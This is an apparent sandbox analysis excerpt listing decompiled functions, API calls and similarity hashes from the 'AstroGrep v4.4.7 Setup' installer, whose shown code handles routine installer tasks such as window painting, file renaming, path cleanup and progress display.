• Instruction Fuzzy Hash: 57A012314041009BCB015B10DF04C097F61A750300B054430E1044403482310820FF09
Uniqueness
Uniqueness Score: -1.00%

                                                                                                            Non-executed Functions

                                                                                                            C-Code - Quality: 90%
E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
	struct tagLOGBRUSH _v16;
	struct tagRECT _v32;
	struct tagPAINTSTRUCT _v96;
	struct HDC__* _t70;
	struct HBRUSH__* _t87;
	struct HFONT__* _t94;
	long _t102;
	signed int _t126;
	struct HDC__* _t128;
	intOrPtr _t130;

	if(_a8 == 0xf) {
		_t130 = *0x42e410;
		_t70 = BeginPaint(_a4, &_v96);
		_v16.lbStyle = _v16.lbStyle & 0x00000000;
		_a8 = _t70;
		GetClientRect(_a4, &_v32);
		_t126 = _v32.bottom;
		_v32.bottom = _v32.bottom & 0x00000000;
		while(_v32.top < _t126) {
			_a12 = _t126 - _v32.top;
			asm("cdq");
			asm("cdq");
			asm("cdq");
			_v16.lbColor = 0 << 0x00000008 | ((*(_t130 + 0x50) & 0x000000ff) * _a12 + (*(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
			_t87 = CreateBrushIndirect(&_v16);
			_v32.bottom = _v32.bottom + 4;
			_a16 = _t87;
			FillRect(_a8, &_v32, _t87);
			DeleteObject(_a16);
			_v32.top = _v32.top + 4;
		}
		if(*(_t130 + 0x58) != 0xffffffff) {
			_t94 = CreateFontIndirectA(*(_t130 + 0x34));
			_a16 = _t94;
			if(_t94 != 0) {
				_t128 = _a8;
				_v32.left = 0x10;
				_v32.top = 8;
				SetBkMode(_t128, 1);
				SetTextColor(_t128, *(_t130 + 0x58));
				_a8 = SelectObject(_t128, _a16);
				DrawTextA(_t128, "AstroGrep v4.4.7 Setup", 0xffffffff, &_v32, 0x820);
				SelectObject(_t128, _a8);
				DeleteObject(_a16);
			}
		}
		EndPaint(_a4, &_v96);
		return 0;
	}
	_t102 = _a16;
	if(_a8 == 0x46) {
		*(_t102 + 0x18) = *(_t102 + 0x18) | 0x00000010;
		*((intOrPtr*)(_t102 + 4)) = *0x42e408;
	}
	return DefWindowProcA(_a4, _a8, _a12, _t102);
}

APIs
• DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
• BeginPaint.USER32(?,?), ref: 00401047
• GetClientRect.USER32 ref: 0040105B
• CreateBrushIndirect.GDI32(00000000), ref: 004010CF
• FillRect.USER32 ref: 004010E4
• DeleteObject.GDI32(?), ref: 004010ED
• CreateFontIndirectA.GDI32(?), ref: 00401105
• SetBkMode.GDI32(00000000,00000001), ref: 00401126
• SetTextColor.GDI32(00000000,000000FF), ref: 00401130
• SelectObject.GDI32(00000000,?), ref: 00401140
• DrawTextA.USER32(00000000,AstroGrep v4.4.7 Setup,000000FF,00000010,00000820), ref: 00401156
• SelectObject.GDI32(00000000,00000000), ref: 00401160
• DeleteObject.GDI32(?), ref: 00401165
• EndPaint.USER32(?,?), ref: 0040116E
Strings
Memory Dump Source
• Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp
• Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp
• Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp
Similarity
• API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
• String ID: AstroGrep v4.4.7 Setup$F
• API String ID: 941294808-965371690
• Opcode ID: 743dd018db8a108fdfb55826faff2fb237305abb1c3a72422579a1c27d61dc24
• Instruction ID: 9af9226455e7fa8211e54ab4aa6b8deb1f4adf461e7c9b231a43246ca388c9df
• Opcode Fuzzy Hash: 743dd018db8a108fdfb55826faff2fb237305abb1c3a72422579a1c27d61dc24
• Instruction Fuzzy Hash: F0419B71804249AFCB058FA5CD459AFBBB9FF44310F00812AF961AA1A0C738EA51DFA5
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00405A78(void* __ecx) {
	void* __ebx;
	void* __edi;
	void* __esi;
	long _t13;
	long _t25;
	char* _t32;
	int _t38;
	void* _t39;
	intOrPtr* _t40;
	long _t43;
	CHAR* _t45;
	void* _t47;
	void* _t49;
	void* _t50;
	void* _t53;
	void* _t54;

	_t39 = __ecx;
	lstrcpyA(0x42b5f8, "NUL");
	_t45 = *(_t53 + 0x18);
	if(_t45 == 0) {
		L3:
		_t13 = GetShortPathNameA(*(_t53 + 0x1c), 0x42b9f8, 0x400);
		if(_t13 != 0 && _t13 <= 0x400) {
			_t38 = wsprintfA(0x42b1f8, "%s=%s\r\n", 0x42b5f8, 0x42b9f8);
			_t54 = _t53 + 0x10;
			E00405D51(_t38, 0x42b5f8, 0x42b9f8, 0x42b9f8, *((intOrPtr*)(*0x42e410 + 0x128)));
			_t13 = E004059A2(0x42b9f8, 0xc0000000, 4);
			_t49 = _t13;
			*(_t54 + 0x18) = _t49;
			if(_t49 != 0xffffffff) {
				_t43 = GetFileSize(_t49, 0);
				_t6 = _t38 + 0xa; // 0xa
				_t47 = GlobalAlloc(0x40, _t43 + _t6);
				if(_t47 == 0 || E00405A1A(_t49, _t47, _t43) == 0) {
					L18:
					return CloseHandle(_t49);
				} else {
					if(E00405907(_t39, _t47, "[Rename]\r\n") != 0) {
						_t50 = E00405907(_t39, _t22 + 0xa, 0x4093b0);
						if(_t50 == 0) {
							_t49 = *(_t54 + 0x18);
							L16:
							_t25 = _t43;
							L17:
							E0040595D(_t25 + _t47, 0x42b1f8, _t38);
							SetFilePointer(_t49, 0, 0, 0);
							E00405A49(_t49, _t47, _t43 + _t38);
							GlobalFree(_t47);
							goto L18;
						}
						_t40 = _t47 + _t43;
						_t32 = _t40 + _t38;
						while(_t40 > _t50) {
							*_t32 = *_t40;
							_t32 = _t32 - 1;
							_t40 = _t40 - 1;
						}
						_t25 = _t50 - _t47 + 1;
						_t49 = *(_t54 + 0x18);
						goto L17;
					}
					lstrcpyA(_t47 + _t43, "[Rename]\r\n");
					_t43 = _t43 + 0xa;
					goto L16;
				}
			}
		}
	} else {
		CloseHandle(E004059A2(_t45, 0, 1));
		_t13 = GetShortPathNameA(_t45, 0x42b5f8, 0x400);
		if(_t13 != 0 && _t13 <= 0x400) {
			goto L3;
		}
	}
	return _t13;
}

                                                                                                            0x00405bde
                                                                                                            0x00000000
                                                                                                            0x00405b59
                                                                                                            0x00405b66
                                                                                                            0x00405b8a
                                                                                                            0x00405b8e
                                                                                                            0x00405bad
                                                                                                            0x00405bb1
                                                                                                            0x00405bb1
                                                                                                            0x00405bb3
                                                                                                            0x00405bbc
                                                                                                            0x00405bc7
                                                                                                            0x00405bd2
                                                                                                            0x00405bd8
                                                                                                            0x00000000
                                                                                                            0x00405bd8
                                                                                                            0x00405b90
                                                                                                            0x00405b93
                                                                                                            0x00405b9e
                                                                                                            0x00405b9a
                                                                                                            0x00405b9c
                                                                                                            0x00405b9d
                                                                                                            0x00405b9d
                                                                                                            0x00405ba5
                                                                                                            0x00405ba7
                                                                                                            0x00000000
                                                                                                            0x00405ba7
                                                                                                            0x00405b71
                                                                                                            0x00405b77
                                                                                                            0x00000000
                                                                                                            0x00405b77
                                                                                                            0x00405b43
                                                                                                            0x00405b21
                                                                                                            0x00405aa0
                                                                                                            0x00405aab
                                                                                                            0x00405ab4
                                                                                                            0x00405ab8
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405ab8
                                                                                                            0x00405be9

                                                                                                            APIs
                                                                                                            • lstrcpyA.KERNEL32(0042B5F8,NUL,?,00000000,?,00000000,00405C0B,?,?), ref: 00405A87
                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,00405C0B,?,?), ref: 00405AAB
                                                                                                            • GetShortPathNameA.KERNEL32 ref: 00405AB4
                                                                                                              • Part of subcall function 00405907: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405917
                                                                                                              • Part of subcall function 00405907: lstrlenA.KERNEL32(00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405949
                                                                                                            • GetShortPathNameA.KERNEL32 ref: 00405AD1
                                                                                                            • wsprintfA.USER32 ref: 00405AEF
                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,0042B9F8,C0000000,00000004,0042B9F8,?,?,?,?,?), ref: 00405B2A
                                                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405B39
                                                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B71
                                                                                                            • SetFilePointer.KERNEL32(004093B0,00000000,00000000,00000000,00000000,0042B1F8,00000000,-0000000A,004093B0,00000000,[Rename],00000000,00000000,00000000), ref: 00405BC7
                                                                                                            • GlobalFree.KERNEL32 ref: 00405BD8
                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405BDF
                                                                                                              • Part of subcall function 004059A2: GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE,80000000,00000003), ref: 004059A6
                                                                                                              • Part of subcall function 004059A2: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059C8
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                                            • String ID: %s=%s$NUL$[Rename]
                                                                                                            • API String ID: 222337774-4148678300
                                                                                                            • Opcode ID: 993d4f636ac995a784a87da88db713d62b233df57c37c449c1136705115a63d5
                                                                                                            • Instruction ID: 8a014ae25a2f57f4e7f496887e8afb480c0f68f452f449b39f33bde68a4ee9be
                                                                                                            • Opcode Fuzzy Hash: 993d4f636ac995a784a87da88db713d62b233df57c37c449c1136705115a63d5
                                                                                                            • Instruction Fuzzy Hash: 5231F370604B19ABC2206B615D49F6B3A6CDF45758F14053AFE01F62D2DA7CB800CEAD
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E00405F9A(CHAR* _a4) {
                                                                                                            				char _t5;
                                                                                                            				char _t7;
                                                                                                            				char* _t15;
                                                                                                            				char* _t16;
                                                                                                            				CHAR* _t17;
                                                                                                            
                                                                                                            				_t17 = _a4;
                                                                                                            				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
                                                                                                            					_t17 =  &(_t17[4]);
                                                                                                            				}
                                                                                                            				if( *_t17 != 0 && E0040580E(_t17) != 0) {
                                                                                                            					_t17 =  &(_t17[2]);
                                                                                                            				}
                                                                                                            				_t5 =  *_t17;
                                                                                                            				_t15 = _t17;
                                                                                                            				_t16 = _t17;
                                                                                                            				if(_t5 != 0) {
                                                                                                            					do {
                                                                                                            						if(_t5 > 0x1f &&  *((char*)(E004057CC("*?|<>/\":", _t5))) == 0) {
                                                                                                            							E0040595D(_t16, _t17, CharNextA(_t17) - _t17);
                                                                                                            							_t16 = CharNextA(_t16);
                                                                                                            						}
                                                                                                            						_t17 = CharNextA(_t17);
                                                                                                            						_t5 =  *_t17;
                                                                                                            					} while (_t5 != 0);
                                                                                                            				}
                                                                                                            				 *_t16 =  *_t16 & 0x00000000;
                                                                                                            				while(1) {
                                                                                                            					_t16 = CharPrevA(_t15, _t16);
                                                                                                            					_t7 =  *_t16;
                                                                                                            					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                                                                            						break;
                                                                                                            					}
                                                                                                            					 *_t16 =  *_t16 & 0x00000000;
                                                                                                            					if(_t15 < _t16) {
                                                                                                            						continue;
                                                                                                            					}
                                                                                                            					break;
                                                                                                            				}
                                                                                                            				return _t7;
                                                                                                            			}
                                                                                                            0x00405f9c
                                                                                                            0x00405fa4
                                                                                                            0x00405fb8
                                                                                                            0x00405fb8
                                                                                                            0x00405fbe
                                                                                                            0x00405fcb
                                                                                                            0x00405fcb
                                                                                                            0x00405fcc
                                                                                                            0x00405fce
                                                                                                            0x00405fd2
                                                                                                            0x00405fd4
                                                                                                            0x00405fdd
                                                                                                            0x00405fdf
                                                                                                            0x00405ff9
                                                                                                            0x00406001
                                                                                                            0x00406001
                                                                                                            0x00406006
                                                                                                            0x00406008
                                                                                                            0x0040600a
                                                                                                            0x0040600e
                                                                                                            0x0040600f
                                                                                                            0x00406012
                                                                                                            0x0040601a
                                                                                                            0x0040601c
                                                                                                            0x00406020
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406026
                                                                                                            0x0040602b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040602b
                                                                                                            0x00406030

                                                                                                            APIs
                                                                                                            • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE" ,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00405FF2
                                                                                                            • CharNextA.USER32(?,?,?,00000000), ref: 00405FFF
                                                                                                            • CharNextA.USER32(?,"C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE" ,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406004
                                                                                                            • CharPrevA.USER32(?,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406014
                                                                                                            Strings
                                                                                                            • *?|<>/":, xrefs: 00405FE2
                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F9B
                                                                                                            • "C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE" , xrefs: 00405FD6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: Char$Next$Prev
                                                                                                            • String ID: "C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                            • API String ID: 589700163-2861144667
                                                                                                            • Opcode ID: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
                                                                                                            • Instruction ID: 57e0f34d942670e43035b7c22e392f1a12bb14715b301cf1348a0c798ab9ef07
                                                                                                            • Opcode Fuzzy Hash: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
                                                                                                            • Instruction Fuzzy Hash: 8B112751809B932AFB3256244C00B7BBFD88F57760F19007BE8D5722C2D67C5D529B6D
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E00403F7B(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                                                                            				struct tagLOGBRUSH _v16;
                                                                                                            				long _t35;
                                                                                                            				long _t37;
                                                                                                            				void* _t40;
                                                                                                            				long* _t49;
                                                                                                            
                                                                                                            				if(_a4 + 0xfffffecd > 5) {
                                                                                                            					L15:
                                                                                                            					return 0;
                                                                                                            				}
                                                                                                            				_t49 = GetWindowLongA(_a12, 0xffffffeb);
                                                                                                            				if(_t49 == 0) {
                                                                                                            					goto L15;
                                                                                                            				}
                                                                                                            				_t35 =  *_t49;
                                                                                                            				if((_t49[5] & 0x00000002) != 0) {
                                                                                                            					_t35 = GetSysColor(_t35);
                                                                                                            				}
                                                                                                            				if((_t49[5] & 0x00000001) != 0) {
                                                                                                            					SetTextColor(_a8, _t35);
                                                                                                            				}
                                                                                                            				SetBkMode(_a8, _t49[4]);
                                                                                                            				_t37 = _t49[1];
                                                                                                            				_v16.lbColor = _t37;
                                                                                                            				if((_t49[5] & 0x00000008) != 0) {
                                                                                                            					_t37 = GetSysColor(_t37);
                                                                                                            					_v16.lbColor = _t37;
                                                                                                            				}
                                                                                                            				if((_t49[5] & 0x00000004) != 0) {
                                                                                                            					SetBkColor(_a8, _t37);
                                                                                                            				}
                                                                                                            				if((_t49[5] & 0x00000010) != 0) {
                                                                                                            					_v16.lbStyle = _t49[2];
                                                                                                            					_t40 = _t49[3];
                                                                                                            					if(_t40 != 0) {
                                                                                                            						DeleteObject(_t40);
                                                                                                            					}
                                                                                                            					_t49[3] = CreateBrushIndirect( &_v16);
                                                                                                            				}
                                                                                                            				return _t49[3];
                                                                                                            			}

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 2320649405-0
                                                                                                            • Opcode ID: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                                                                                            • Instruction ID: f3431a0ddd372d44177634c3e6640760e16b4c563197d04d055afd4279a4596b
                                                                                                            • Opcode Fuzzy Hash: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                                                                                            • Instruction Fuzzy Hash: F4219F71808705ABCB209F78DD48A4BBBF8AF41704B048A2AE996F26E0C734E904CB55
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E00404813(struct HWND__* _a4, intOrPtr _a8) {
                                                                                                            				long _v8;
                                                                                                            				signed char _v12;
                                                                                                            				unsigned int _v16;
                                                                                                            				void* _v20;
                                                                                                            				intOrPtr _v24;
                                                                                                            				long _v56;
                                                                                                            				void* _v60;
                                                                                                            				long _t15;
                                                                                                            				unsigned int _t19;
                                                                                                            				signed int _t25;
                                                                                                            				struct HWND__* _t28;
                                                                                                            
                                                                                                            				_t28 = _a4;
                                                                                                            				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
                                                                                                            				if(_a8 == 0) {
                                                                                                            					L4:
                                                                                                            					_v56 = _t15;
                                                                                                            					_v60 = 4;
                                                                                                            					SendMessageA(_t28, 0x110c, 0,  &_v60);
                                                                                                            					return _v24;
                                                                                                            				}
                                                                                                            				_t19 = GetMessagePos();
                                                                                                            				_v16 = _t19 >> 0x10;
                                                                                                            				_v20 = _t19;
                                                                                                            				ScreenToClient(_t28,  &_v20);
                                                                                                            				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
                                                                                                            				if((_v12 & 0x00000066) != 0) {
                                                                                                            					_t15 = _v8;
                                                                                                            					goto L4;
                                                                                                            				}
                                                                                                            				return _t25 | 0xffffffff;
                                                                                                            			}

                                                                                                            APIs
                                                                                                            • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040482E
                                                                                                            • GetMessagePos.USER32 ref: 00404836
                                                                                                            • ScreenToClient.USER32 ref: 00404850
                                                                                                            • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404862
                                                                                                            • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404888
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: Message$Send$ClientScreen
                                                                                                            • String ID: f
                                                                                                            • API String ID: 41195575-1993550816
                                                                                                            • Opcode ID: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                                                                                            • Instruction ID: 72a6dff9965abeea3fde93c43f55bc8d1d0b984f63b53e8c81f3052648e7bb03
                                                                                                            • Opcode Fuzzy Hash: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                                                                                            • Instruction Fuzzy Hash: EC019275D00218BADB00DBA5DC41FFEBBBCAF45711F10412BBB10B61C0C7B4A5018BA5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E00402B7F(struct HWND__* _a4, intOrPtr _a8) {
                                                                                                            				char _v68;
                                                                                                            				int _t11;
                                                                                                            				int _t20;
                                                                                                            
                                                                                                            				if(_a8 == 0x110) {
                                                                                                            					SetTimer(_a4, 1, 0xfa, 0);
                                                                                                            					_a8 = 0x113;
                                                                                                            				}
                                                                                                            				if(_a8 == 0x113) {
                                                                                                            					_t20 =  *0x414418; // 0xe817a
                                                                                                            					_t11 =  *0x420424; // 0xe817e
                                                                                                            					if(_t20 >= _t11) {
                                                                                                            						_t20 = _t11;
                                                                                                            					}
                                                                                                            					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
                                                                                                            					SetWindowTextA(_a4,  &_v68);
                                                                                                            					SetDlgItemTextA(_a4, 0x406,  &_v68);
                                                                                                            				}
                                                                                                            				return 0;
                                                                                                            			}

                                                                                                            APIs
                                                                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B9A
                                                                                                            • MulDiv.KERNEL32(000E817A,00000064,000E817E), ref: 00402BC5
                                                                                                            • wsprintfA.USER32 ref: 00402BD5
                                                                                                            • SetWindowTextA.USER32(?,?), ref: 00402BE5
                                                                                                            • SetDlgItemTextA.USER32 ref: 00402BF7
                                                                                                            Strings
                                                                                                            • verifying installer: %d%%, xrefs: 00402BCF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                                                            • String ID: verifying installer: %d%%
                                                                                                            • API String ID: 1451636040-82062127
                                                                                                            • Opcode ID: 006cffcf8240dfc76d7e4b6e7b59e3417ee2623043ecf049c00372ee4aca6d42
                                                                                                            • Instruction ID: f77185bba9c57e6aa61c0c8aee9f592e237af7c43fbef78eddb3d4185353df7a
                                                                                                            • Opcode Fuzzy Hash: 006cffcf8240dfc76d7e4b6e7b59e3417ee2623043ecf049c00372ee4aca6d42
                                                                                                            • Instruction Fuzzy Hash: D001F471640208BBEF209F60DD09EAE3779EB04744F008039FA16B51D1D7B5A955DB59
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 71%
                                                                                                            			E00401D38() {
                                                                                                            				void* __esi;
                                                                                                            				int _t7;
                                                                                                            				signed char _t13;
                                                                                                            				struct HFONT__* _t16;
                                                                                                            				void* _t20;
                                                                                                            				struct HDC__* _t26;
                                                                                                            				void* _t28;
                                                                                                            				void* _t30;
                                                                                                            
                                                                                                            				_t26 = GetDC( *(_t30 - 8));
                                                                                                            				_t7 = GetDeviceCaps(_t26, 0x5a);
                                                                                                            				0x40a818->lfHeight =  ~(MulDiv(E00402A1D(2), _t7, 0x48));
                                                                                                            				ReleaseDC( *(_t30 - 8), _t26);
                                                                                                            				 *0x40a828 = E00402A1D(3);
                                                                                                            				_t13 =  *((intOrPtr*)(_t30 - 0x18));
                                                                                                            				 *0x40a82f = 1;
                                                                                                            				 *0x40a82c = _t13 & 0x00000001;
                                                                                                            				 *0x40a82d = _t13 & 0x00000002;
                                                                                                            				 *0x40a82e = _t13 & 0x00000004;
                                                                                                            				E00405D51(_t20, _t26, _t28, "MS Shell Dlg",  *((intOrPtr*)(_t30 - 0x24)));
                                                                                                            				_t16 = CreateFontIndirectA(0x40a818);
                                                                                                            				_push(_t16);
                                                                                                            				_push(_t28);
                                                                                                            				E00405C8D();
                                                                                                            				 *0x42e488 =  *0x42e488 +  *((intOrPtr*)(_t30 - 4));
                                                                                                            				return 0;
                                                                                                            			}

                                                                                                            APIs
                                                                                                            • GetDC.USER32(?), ref: 00401D3B
                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D48
                                                                                                            • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D57
                                                                                                            • ReleaseDC.USER32 ref: 00401D68
                                                                                                            • CreateFontIndirectA.GDI32(0040A818), ref: 00401DB3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                            • String ID: MS Shell Dlg
                                                                                                            • API String ID: 3808545654-76309092
                                                                                                            • Opcode ID: c2a9d05608db3b551cbe7321e8fd88224b197bc40f94a71f0fff53b7c1922a27
                                                                                                            • Instruction ID: ad7d238852a8d87b5aaa3e6a204337ae93e1cce4a0b470fbec170e72a625d374
                                                                                                            • Opcode Fuzzy Hash: c2a9d05608db3b551cbe7321e8fd88224b197bc40f94a71f0fff53b7c1922a27
                                                                                                            • Instruction Fuzzy Hash: EA01D632944340AFEB0177B0AE4EBAA3FB49759309F108479F201B62E2C6790052CF6F
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E00403974(void* __ecx, void* __eflags) {
                                                                                                            				void* __ebx;
                                                                                                            				void* __edi;
                                                                                                            				void* __esi;
                                                                                                            				signed short _t6;
                                                                                                            				intOrPtr _t11;
                                                                                                            				signed int _t13;
                                                                                                            				signed int _t16;
                                                                                                            				signed short* _t18;
                                                                                                            				signed int _t20;
                                                                                                            				signed short* _t23;
                                                                                                            				intOrPtr _t25;
                                                                                                            				signed int _t26;
                                                                                                            				intOrPtr* _t27;
                                                                                                            
                                                                                                            				_t24 = "1033";
                                                                                                            				_t13 = 0xffff;
                                                                                                            				_t6 = E00405CA6(__ecx, "1033");
                                                                                                            				while(1) {
                                                                                                            					_t26 =  *0x42e444;
